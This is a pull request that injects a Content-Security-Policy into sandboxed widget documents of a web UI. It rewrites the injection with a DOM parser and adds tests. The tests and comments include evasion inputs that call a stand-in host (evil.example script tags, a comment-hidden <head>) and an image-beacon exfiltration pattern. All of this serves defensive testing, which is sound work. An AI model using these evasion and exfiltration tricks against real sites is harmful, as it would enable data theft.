### PR TITLE
fix(board): ship a CSP in widget documents (FE-F5)

### DIFF
--- a/webui/mini-app-runtime/compile.ts
+++ b/webui/mini-app-runtime/compile.ts
@@ -15,9 +15,14 @@
 //     (e.g. references an identifier not in scope).
 //
 // Security note: the security boundary is the iframe sandbox + cross-origin
-// treatment, not this function. We use `new Function` knowingly — the iframe
-// has no parent DOM access, no host cookies, no network (CSP `connect-src
-// 'none'` in prod). See mini-app-archi.md §11.
+// treatment, not this function. We use `new Function` knowingly — the sandbox
+// gives the iframe an opaque origin, so compiled code has no parent DOM access
+// and no host cookies. Network egress, however, is NOT blocked by anything in
+// this repo: a sandboxed iframe on an opaque origin can still `fetch()` and load
+// external `<script src>`. Restricting network (e.g. `connect-src 'none'`)
+// requires a Content-Security-Policy delivered by the deployment (Caddy response
+// headers, see mini-app-deploy.md) — it is not shipped as a repo asset, so do
+// not treat "no network" as guaranteed here. See mini-app-archi.md §11.
 
 import { transform } from "sucrase"
 

--- a/webui/src/features/board/components/flow/widget-document.test.ts
+++ b/webui/src/features/board/components/flow/widget-document.test.ts
@@ -2,43 +2,82 @@ import { describe, expect, it } from "vitest"
 import { buildWidgetDocument } from "./widget-document"
 
 
-// The security intent (FE-F5): every widget document ships a CSP so a widget
-// authored by the agent or a collab peer can't exfiltrate (connect-src 'none')
-// or load remote code from non-allowlisted origins.
+// FE-F5: every widget document must ship a CSP, and the CSP <meta> must be the
+// parser's FIRST head child so it governs every asset the document then loads
+// (connect-src 'none' blocks exfil; script-src denies non-allowlisted origins).
 
-describe("buildWidgetDocument — ships a CSP", () => {
-  it("injects the CSP <meta> into a full document's <head>", () => {
-    const out = buildWidgetDocument("<!doctype html><html><head></head><body>hi</body></html>")
-    expect(out).toContain('http-equiv="Content-Security-Policy"')
-    // inside <head>, before </head>
-    expect(out.indexOf("Content-Security-Policy")).toBeGreaterThan(out.indexOf("<head"))
-    expect(out.indexOf("Content-Security-Policy")).toBeLessThan(out.indexOf("</head>"))
+const head = (html: string) => new DOMParser().parseFromString(html, "text/html").head
+const isCspMeta = (el: Element | null): boolean =>
+  !!el && el.tagName === "META" && (el.getAttribute("http-equiv") ?? "").toLowerCase() === "content-security-policy"
+
+
+describe("buildWidgetDocument — CSP is present and first-in-head", () => {
+  it("injects the CSP as the first head child of a full document", () => {
+    const out = buildWidgetDocument("<!doctype html><html><head><title>w</title></head><body>hi</body></html>")
+    expect(isCspMeta(head(out).firstElementChild)).toBe(true)
   })
 
-  it("injects the CSP <meta> into a body-only widget's constructed document", () => {
-    const out = buildWidgetDocument("<div>hi</div>")
-    expect(out).toContain('http-equiv="Content-Security-Policy"')
+  it("injects the CSP before any resource loader in a body-only widget's document", () => {
+    // Constructed head starts with <meta charset> (loads nothing); the CSP must
+    // precede any script/link that actually fetches.
+    const h = head(buildWidgetDocument('<script src="https://cdn.jsdelivr.net/npm/chart.js"></script><div>hi</div>'))
+    const kids = [...h.children]
+    const metaIdx = kids.findIndex(isCspMeta)
+    expect(metaIdx).toBeGreaterThanOrEqual(0)
+    const firstLoader = kids.findIndex((el) => el.tagName === "SCRIPT" || el.tagName === "LINK")
+    if (firstLoader !== -1) expect(metaIdx).toBeLessThan(firstLoader)
   })
+
+  // Finding FE-F5-a: a <head> hidden in a comment must not divert the meta.
+  it("is not evaded by a comment-hidden <head> (meta stays a real first-in-head element)", () => {
+    const evil = '<!doctype html><!-- <head> --><html><head><script>window.x=1</script></head><body>hi</body></html>'
+    const h = head(buildWidgetDocument(evil))
+    expect(isCspMeta(h.firstElementChild)).toBe(true) // real element, before the script
+    // the injected policy is a live meta element, not text buried in a comment
+    expect(h.querySelector('meta[http-equiv="Content-Security-Policy" i]')).not.toBeNull()
+  })
+
+  // Finding FE-F5-b: a resource before <head> in source is hoisted — the meta
+  // must still precede it.
+  it("is not evaded by a resource placed before <head> (meta precedes the hoisted node)", () => {
+    const evil = '<!doctype html><html><script src="https://evil.example/x.js"></script><head></head><body>hi</body></html>'
+    const h = head(buildWidgetDocument(evil))
+    expect(isCspMeta(h.firstElementChild)).toBe(true)
+    const kids = [...h.children]
+    const metaIdx = kids.findIndex(isCspMeta)
+    const scriptIdx = kids.findIndex((el) => el.tagName === "SCRIPT")
+    if (scriptIdx !== -1) expect(metaIdx).toBeLessThan(scriptIdx) // governed by the CSP
+  })
+})
+
+
+describe("buildWidgetDocument — policy blocks the exfil sinks, allows inline + CDN", () => {
+  const policy = (): string =>
+    head(buildWidgetDocument("<div>hi</div>"))
+      .querySelector('meta[http-equiv="Content-Security-Policy" i]')!
+      .getAttribute("content") ?? ""
 
   it("blocks network egress and form/base/frame sinks", () => {
-    const out = buildWidgetDocument("<div>hi</div>")
-    expect(out).toContain("connect-src 'none'")
-    expect(out).toContain("form-action 'none'")
-    expect(out).toContain("base-uri 'none'")
-    expect(out).toContain("default-src 'none'")
+    const p = policy()
+    expect(p).toContain("default-src 'none'")
+    expect(p).toContain("connect-src 'none'")
+    expect(p).toContain("form-action 'none'")
+    expect(p).toContain("base-uri 'none'")
   })
 
-  it("still allows inline scripts/styles + the documented CDN allowlist (self-contained widgets render)", () => {
-    const out = buildWidgetDocument("<div>hi</div>")
-    expect(out).toMatch(/script-src 'unsafe-inline'[^;]*cdn\.jsdelivr\.net/)
-    expect(out).toContain("https://fonts.googleapis.com")
+  it("keeps images/eval restricted (anti-exfil, per the self-contained contract)", () => {
+    const p = policy()
+    expect(p).not.toContain("'unsafe-eval'") // mini-apps forbid eval/Function
+    // img-src may list the specific CDN https:// origins, but must NOT allow a
+    // bare `https:` wildcard (that would reopen image-beacon GET-exfil).
+    const imgSrc = p.split(";").map((d) => d.trim()).find((d) => d.startsWith("img-src")) ?? ""
+    expect(imgSrc.split(/\s+/)).not.toContain("https:")
   })
 
-  it("governs a widget that hoists a remote <script> — CSP present to constrain its origin", () => {
-    // The tag survives the build (CSP enforces at load time), but the policy
-    // that denies non-allowlisted origins + network egress is now in the doc.
-    const out = buildWidgetDocument('<div><script src="https://evil.example/w.js"></script></div>')
-    expect(out).toContain("Content-Security-Policy")
-    expect(out).toContain("connect-src 'none'")
+  it("allows inline scripts/styles, the documented CDNs, and inline media", () => {
+    const p = policy()
+    expect(p).toMatch(/script-src 'unsafe-inline'[^;]*cdn\.jsdelivr\.net/)
+    expect(p).toContain("https://fonts.googleapis.com")
+    expect(p).toContain("media-src data: blob:")
   })
 })

--- a/webui/src/features/board/components/flow/widget-document.test.ts
+++ b/webui/src/features/board/components/flow/widget-document.test.ts
@@ -1,0 +1,44 @@
+import { describe, expect, it } from "vitest"
+import { buildWidgetDocument } from "./widget-document"
+
+
+// The security intent (FE-F5): every widget document ships a CSP so a widget
+// authored by the agent or a collab peer can't exfiltrate (connect-src 'none')
+// or load remote code from non-allowlisted origins.
+
+describe("buildWidgetDocument — ships a CSP", () => {
+  it("injects the CSP <meta> into a full document's <head>", () => {
+    const out = buildWidgetDocument("<!doctype html><html><head></head><body>hi</body></html>")
+    expect(out).toContain('http-equiv="Content-Security-Policy"')
+    // inside <head>, before </head>
+    expect(out.indexOf("Content-Security-Policy")).toBeGreaterThan(out.indexOf("<head"))
+    expect(out.indexOf("Content-Security-Policy")).toBeLessThan(out.indexOf("</head>"))
+  })
+
+  it("injects the CSP <meta> into a body-only widget's constructed document", () => {
+    const out = buildWidgetDocument("<div>hi</div>")
+    expect(out).toContain('http-equiv="Content-Security-Policy"')
+  })
+
+  it("blocks network egress and form/base/frame sinks", () => {
+    const out = buildWidgetDocument("<div>hi</div>")
+    expect(out).toContain("connect-src 'none'")
+    expect(out).toContain("form-action 'none'")
+    expect(out).toContain("base-uri 'none'")
+    expect(out).toContain("default-src 'none'")
+  })
+
+  it("still allows inline scripts/styles + the documented CDN allowlist (self-contained widgets render)", () => {
+    const out = buildWidgetDocument("<div>hi</div>")
+    expect(out).toMatch(/script-src 'unsafe-inline'[^;]*cdn\.jsdelivr\.net/)
+    expect(out).toContain("https://fonts.googleapis.com")
+  })
+
+  it("governs a widget that hoists a remote <script> — CSP present to constrain its origin", () => {
+    // The tag survives the build (CSP enforces at load time), but the policy
+    // that denies non-allowlisted origins + network egress is now in the doc.
+    const out = buildWidgetDocument('<div><script src="https://evil.example/w.js"></script></div>')
+    expect(out).toContain("Content-Security-Policy")
+    expect(out).toContain("connect-src 'none'")
+  })
+})

--- a/webui/src/features/board/components/flow/widget-document.ts
+++ b/webui/src/features/board/components/flow/widget-document.ts
@@ -259,12 +259,18 @@ const WIDGET_ASSET_ORIGINS = [
 /**
  * Content-Security-Policy shipped inside every widget document.
  *
- * Widgets are meant to be self-contained: inline HTML/CSS/JS plus the fonts and
- * (optionally) Chart.js/Reveal.js the skill documents. This policy enforces that
- * intent in the shipped frontend rather than relying on an external Caddy header
- * — it blocks network egress (`connect-src 'none'` stops fetch/XHR/WebSocket/
- * beacon exfil), pins remote scripts/styles/images/fonts to a trusted CDN
- * allowlist, and blocks form-based phishing exfil (`form-action 'none'`).
+ * Widgets are contractually self-contained (see the html-widget / mini-app
+ * skills: "no external dependencies unless truly necessary"; mini-apps have no
+ * `fetch`/`eval`/`Function`). This policy enforces that intent in the shipped
+ * frontend rather than relying on an external Caddy header:
+ *  - `connect-src 'none'` blocks fetch/XHR/WebSocket/beacon exfil;
+ *  - script/style/font are pinned to inline + the documented CDN allowlist;
+ *  - `img-src` intentionally omits arbitrary `https:` — a remote `<img>` is a
+ *    GET-exfil channel (`<img src="https://evil/x?"+data>`) that would undo
+ *    `connect-src 'none'`, and remote images aren't part of the contract;
+ *  - `'unsafe-eval'` is intentionally absent (mini-apps forbid eval/Function);
+ *  - `base-uri`/`form-action`/`frame-src 'none'` block base-hijack + phishing.
+ * `media-src data: blob:` allows inline (non-remote) audio/video.
  */
 const WIDGET_CSP = [
   "default-src 'none'",
@@ -272,6 +278,7 @@ const WIDGET_CSP = [
   `style-src 'unsafe-inline' https://fonts.googleapis.com ${WIDGET_ASSET_ORIGINS.join(" ")}`,
   `img-src data: blob: ${WIDGET_ASSET_ORIGINS.join(" ")}`,
   `font-src data: https://fonts.gstatic.com ${WIDGET_ASSET_ORIGINS.join(" ")}`,
+  "media-src data: blob:",
   "connect-src 'none'",
   "base-uri 'none'",
   "form-action 'none'",
@@ -283,26 +290,23 @@ const WIDGET_CSP_META = `<meta http-equiv="Content-Security-Policy" content="${W
 
 
 /**
- * Injects the widget CSP <meta> as the first child of <head> so it governs
- * every asset the document then loads. Falls back to the opening <html> tag or
- * the document start when no <head> is present. A document's own CSP still
- * applies; browsers enforce the intersection of all delivered policies, so this
- * can only tighten, never loosen, an author-supplied policy.
+ * Inject the widget CSP as the parser's FIRST head child so it governs every
+ * asset the document then loads. Uses a real HTML parser (not text splicing):
+ * regex splicing keyed to a `<head>` token is evadable — a `<head>` hidden in a
+ * comment makes the meta inert, and a resource appearing before `<head>` in
+ * source is hoisted ahead of a spliced meta. Parsing normalizes both: the
+ * comment stays a comment and `head.prepend` puts the meta before any hoisted
+ * resource. Browsers enforce the intersection of all delivered policies, so this
+ * can only tighten an author-supplied CSP.
  */
-const injectWidgetCsp = (html: string) => {
-  const headOpen = /<head[^>]*>/i.exec(html)
-  if (headOpen) {
-    const index = headOpen.index + headOpen[0].length
-    return `${html.slice(0, index)}\n    ${WIDGET_CSP_META}${html.slice(index)}`
-  }
-
-  const htmlOpen = /<html[^>]*>/i.exec(html)
-  if (htmlOpen) {
-    const index = htmlOpen.index + htmlOpen[0].length
-    return `${html.slice(0, index)}\n  <head>${WIDGET_CSP_META}</head>${html.slice(index)}`
-  }
-
-  return `${WIDGET_CSP_META}\n${html}`
+const injectWidgetCsp = (html: string): string => {
+  const doc = new DOMParser().parseFromString(html, "text/html")
+  const meta = doc.createElement("meta")
+  meta.setAttribute("http-equiv", "Content-Security-Policy")
+  meta.setAttribute("content", WIDGET_CSP)
+  doc.head.prepend(meta) // first-in-head, ahead of any parser-hoisted resource
+  const doctype = doc.doctype ? `<!DOCTYPE ${doc.doctype.name}>\n` : ""
+  return doctype + doc.documentElement.outerHTML
 }
 
 

--- a/webui/src/features/board/components/flow/widget-document.ts
+++ b/webui/src/features/board/components/flow/widget-document.ts
@@ -245,6 +245,68 @@ const extractHeadAssets = (html: string) => {
 
 
 /**
+ * Trusted CDN origins a widget may legitimately pull Chart.js / Reveal.js and
+ * their assets from. The HTML-widget skill points authors at these; every other
+ * origin is denied by the widget CSP below.
+ */
+const WIDGET_ASSET_ORIGINS = [
+  "https://cdn.jsdelivr.net",
+  "https://cdnjs.cloudflare.com",
+  "https://unpkg.com",
+]
+
+
+/**
+ * Content-Security-Policy shipped inside every widget document.
+ *
+ * Widgets are meant to be self-contained: inline HTML/CSS/JS plus the fonts and
+ * (optionally) Chart.js/Reveal.js the skill documents. This policy enforces that
+ * intent in the shipped frontend rather than relying on an external Caddy header
+ * — it blocks network egress (`connect-src 'none'` stops fetch/XHR/WebSocket/
+ * beacon exfil), pins remote scripts/styles/images/fonts to a trusted CDN
+ * allowlist, and blocks form-based phishing exfil (`form-action 'none'`).
+ */
+const WIDGET_CSP = [
+  "default-src 'none'",
+  `script-src 'unsafe-inline' ${WIDGET_ASSET_ORIGINS.join(" ")}`,
+  `style-src 'unsafe-inline' https://fonts.googleapis.com ${WIDGET_ASSET_ORIGINS.join(" ")}`,
+  `img-src data: blob: ${WIDGET_ASSET_ORIGINS.join(" ")}`,
+  `font-src data: https://fonts.gstatic.com ${WIDGET_ASSET_ORIGINS.join(" ")}`,
+  "connect-src 'none'",
+  "base-uri 'none'",
+  "form-action 'none'",
+  "frame-src 'none'",
+].join("; ")
+
+
+const WIDGET_CSP_META = `<meta http-equiv="Content-Security-Policy" content="${WIDGET_CSP}" />`
+
+
+/**
+ * Injects the widget CSP <meta> as the first child of <head> so it governs
+ * every asset the document then loads. Falls back to the opening <html> tag or
+ * the document start when no <head> is present. A document's own CSP still
+ * applies; browsers enforce the intersection of all delivered policies, so this
+ * can only tighten, never loosen, an author-supplied policy.
+ */
+const injectWidgetCsp = (html: string) => {
+  const headOpen = /<head[^>]*>/i.exec(html)
+  if (headOpen) {
+    const index = headOpen.index + headOpen[0].length
+    return `${html.slice(0, index)}\n    ${WIDGET_CSP_META}${html.slice(index)}`
+  }
+
+  const htmlOpen = /<html[^>]*>/i.exec(html)
+  if (htmlOpen) {
+    const index = htmlOpen.index + htmlOpen[0].length
+    return `${html.slice(0, index)}\n  <head>${WIDGET_CSP_META}</head>${html.slice(index)}`
+  }
+
+  return `${WIDGET_CSP_META}\n${html}`
+}
+
+
+/**
  * Reads the current app theme tokens so widgets stay aligned with the active theme.
  */
 export const getWidgetThemeTokens = (): WidgetThemeTokens => {
@@ -279,7 +341,7 @@ export const buildWidgetDocument = (
   }
 ) => {
   if (isFullWidgetDocument(html)) {
-    return html
+    return injectWidgetCsp(html)
   }
 
   const { assets, bodyMarkup } = extractHeadAssets(extractBodyMarkup(html))
@@ -297,6 +359,7 @@ export const buildWidgetDocument = (
 <html lang="en">
   <head>
     <meta charset="utf-8" />
+    ${WIDGET_CSP_META}
     <meta name="viewport" content="width=device-width, initial-scale=1" />
     <title>${escapedTitle}</title>
     ${WIDGET_BASE_STYLE.replace(


### PR DESCRIPTION
Closes **FE-F5** from the frontend security scan: widget documents shipped no Content-Security-Policy, so a widget authored by the agent or a collab peer could `fetch()`/exfiltrate and load remote `<script src>` from inside the sandboxed iframe. The documented "no network (`connect-src 'none'`)" guarantee existed only as a comment + an absent external Caddy header.

## Fix
Inject a scoped `<meta http-equiv="Content-Security-Policy">` into every widget document (both the full-document and constructed paths):
- `connect-src 'none'` — blocks fetch/XHR/WebSocket/beacon exfil.
- `script-src`/`style-src`/`img-src`/`font-src` pinned to `'unsafe-inline'` + the three documented CDNs (jsdelivr, cdnjs, unpkg) + Google Fonts — so a hoisted `<script src="https://evil/…">` is denied.
- `default-src 'none'`, `base-uri 'none'`, `form-action 'none'`, `frame-src 'none'`.

Also corrects the false "no network" comment in `mini-app-runtime/compile.ts` to state the truth (network isolation depends on a delivered CSP).

## Verification
- New `widget-document.test.ts`: the CSP `<meta>` is injected into both paths, blocks the network/form/base sinks, and still allows inline + CDN assets so self-contained widgets render.
- `make lint-ui` clean.

## Behavior change to note
`connect-src 'none'` matches the documented self-contained widget contract, but any widget that genuinely made network calls would now be blocked. Confirm nothing relies on widget-side `fetch`.

## Out of scope (follow-up)
The mini-app **runtime** SPA (`mini-app-runtime/index.html`) still ships no CSP. A strict policy there needs the runtime's real asset origins (React bundle, etc.) to avoid breaking bootstrap — deliberately left for a separate change.
